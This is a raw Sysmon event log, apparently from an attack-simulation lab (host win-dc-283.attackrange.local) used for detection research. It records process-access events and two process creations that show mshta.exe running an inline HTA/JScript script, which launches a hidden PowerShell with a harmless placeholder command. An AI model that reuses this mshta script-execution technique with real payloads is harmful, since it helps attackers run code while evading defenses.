15:59:45.100{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000027761Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:45.100{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000027760Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:45.100{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000027759Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:45.100{7901BC46-4A88-6008-F200-00000000A301}19122148C:\Windows\system32\csrss.exe{7901BC46-5371-6008-7B06-00000000A301}5760C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000027758Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:45.100{7901BC46-5371-6008-7A06-00000000A301}1132172C:\Windows\System32\mshta.exe{7901BC46-5371-6008-7B06-00000000A301}5760C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e55f|C:\Windows\System32\windows.storage.dll+16e1d5|C:\Windows\System32\windows.storage.dll+16dcc6|C:\Windows\System32\windows.storage.dll+16f138|C:\Windows\System32\windows.storage.dll+16daee|C:\Windows\System32\windows.storage.dll+fd005|C:\Windows\System32\windows.storage.dll+fd384|C:\Windows\System32\windows.storage.dll+fc9c0|C:\Windows\System32\shell32.dll+8d42f|C:\Windows\System32\shell32.dll+8d2bc|C:\Windows\System32\shell32.dll+6b47e|C:\Windows\System32\shcore.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000027757Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:45.102{7901BC46-5371-6008-7B06-00000000A301}5760C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -Command Write-Host aaaaaaaa-aaaa-aaaa-aaaa-aaaaaaaaaaaa; Start-Sleep -Seconds 2; exitC:\Windows\system32\ATTACKRANGE\Administrator{7901BC46-4A89-6008-6879-0C0000000000}0xc79682HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{7901BC46-5371-6008-7A06-00000000A301}1132C:\Windows\System32\mshta.exe"C:\Windows\System32\mshta.exe" "about:<hta:application><script language="JScript">a=new%20ActiveXObject("WScript.Shell");a.Run("powershell.exe%20-nop%20-Command%20Write-Host%20aaaaaaaa-aaaa-aaaa-aaaa-aaaaaaaaaaaa;%20Start-Sleep%20-Seconds%202;%20exit",0,true);close();</script>'" 10341000x800000000000000027756Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:45.069{7901BC46-4A8C-6008-0601-00000000A301}25005936C:\Windows\Explorer.EXE{7901BC46-5371-6008-7A06-00000000A301}1132C:\Windows\System32\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b090f|C:\Windows\System32\SHELL32.dll+b14b5|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000027755Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:45.069{7901BC46-4A8C-6008-0601-00000000A301}25005936C:\Windows\Explorer.EXE{7901BC46-5371-6008-7A06-00000000A301}1132C:\Windows\System32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b13ce|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000027754Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:45.069{7901BC46-4A8C-6008-0601-00000000A301}25005936C:\Windows\Explorer.EXE{7901BC46-5371-6008-7A06-00000000A301}1132C:\Windows\System32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b1397|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000027753Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:45.069{7901BC46-4A8C-6008-0601-00000000A301}25005936C:\Windows\Explorer.EXE{7901BC46-5371-6008-7A06-00000000A301}1132C:\Windows\System32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Explorer.EXE+1f054|C:\Windows\Explorer.EXE+1f000|C:\Windows\Explorer.EXE+1dfec|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000027752Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:45.053{7901BC46-4A8A-6008-0001-00000000A301}48362036C:\Windows\system32\taskhostw.exe{7901BC46-5371-6008-7A06-00000000A301}1132C:\Windows\System32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\MSCTF.dll+f681|C:\Windows\System32\MSCTF.dll+fbf9|C:\Windows\System32\MSCTF.dll+105e3|C:\Windows\System32\MSCTF.dll+3d732|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000027751Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:45.053{7901BC46-4A8A-6008-0001-00000000A301}48362036C:\Windows\system32\taskhostw.exe{7901BC46-5371-6008-7A06-00000000A301}1132C:\Windows\System32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\MSCTF.dll+f681|C:\Windows\System32\MSCTF.dll+fbf9|C:\Windows\System32\MSCTF.dll+105e3|C:\Windows\System32\MSCTF.dll+3d732|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000027750Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:45.053{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-5371-6008-7A06-00000000A301}1132C:\Windows\System32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000027749Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:45.053{7901BC46-4985-6008-0B00-00000000A301}85696C:\Windows\system32\lsass.exe{7901BC46-5371-6008-7A06-00000000A301}1132C:\Windows\System32\mshta.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000027748Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:45.053{7901BC46-4985-6008-0B00-00000000A301}85696C:\Windows\system32\lsass.exe{7901BC46-5371-6008-7A06-00000000A301}1132C:\Windows\System32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000027747Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:45.037{7901BC46-4987-6008-1600-00000000A301}15362116C:\Windows\system32\svchost.exe{7901BC46-5371-6008-7A06-00000000A301}1132C:\Windows\System32\mshta.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000027746Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:45.037{7901BC46-4987-6008-1600-00000000A301}15361576C:\Windows\system32\svchost.exe{7901BC46-5371-6008-7A06-00000000A301}1132C:\Windows\System32\mshta.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000027745Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:45.022{7901BC46-4A88-6008-F200-00000000A301}19124816C:\Windows\system32\csrss.exe{7901BC46-5371-6008-7A06-00000000A301}1132C:\Windows\System32\mshta.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000027744Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:45.022{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000027743Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:45.022{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000027742Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:45.022{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000027741Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:45.022{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000027740Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:45.022{7901BC46-4984-6008-0500-00000000A301}6401076C:\Windows\system32\csrss.exe{7901BC46-5371-6008-7A06-00000000A301}1132C:\Windows\System32\mshta.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000027739Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:45.022{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5371-6008-7A06-00000000A301}1132C:\Windows\System32\mshta.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\wbem\cimwin32.dll+3adce|C:\Windows\system32\wbem\cimwin32.dll+3d475|C:\Windows\system32\wbem\cimwin32.dll+3ab15|C:\Windows\system32\wbem\cimwin32.dll+3b393|C:\Windows\system32\wbem\cimwin32.dll+3bb40|C:\Windows\SYSTEM32\framedynos.dll+20256|C:\Windows\SYSTEM32\framedynos.dll+218b5|C:\Windows\system32\wbem\wmiprvse.exe+1704a|C:\Windows\system32\wbem\wmiprvse.exe+1724f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4 154100x800000000000000027738Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:45.027{7901BC46-5371-6008-7A06-00000000A301}1132C:\Windows\System32\mshta.exe11.00.14393.2007 (rs1_release.171231-1800)Microsoft (R) HTML Application hostInternet ExplorerMicrosoft CorporationMSHTA.EXE"C:\Windows\System32\mshta.exe" "about:<hta:application><script language="JScript">a=new%%20ActiveXObject("WScript.Shell");a.Run("powershell.exe%%20-nop%%20-Command%%20Write-Host%%20aaaaaaaa-aaaa-aaaa-aaaa-aaaaaaaaaaaa;%%20Start-Sleep%%20-Seconds%%202;%%20exit",0,true);close();</script>'"C:\Windows\system32\ATTACKRANGE\Administrator{7901BC46-4A89-6008-6879-0C0000000000}0xc79682HighMD5=5CED5D5B469724D9992F5E8117ECEFB5,SHA256=9D58F407AC581DB4A39066F7CB549BF73709EC3D81EF352801C9FB0235EA7FBC,IMPHASH=BECF3D88380DC97C52B1C2E7B1BCCF4B{7901BC46-5350-6008-1E06-00000000A301}6628C:\Windows\System32\wbem\WmiPrvSE.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding 10341000x800000000000000027737Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:45.006{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-536F-6008-7906-00000000A301}2864C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027736Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:45.006{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-536F-6008-7806-00000000A301}5840C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027735Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:45.006{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-536F-6008-7706-00000000A301}5156C:\Windows\System32\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 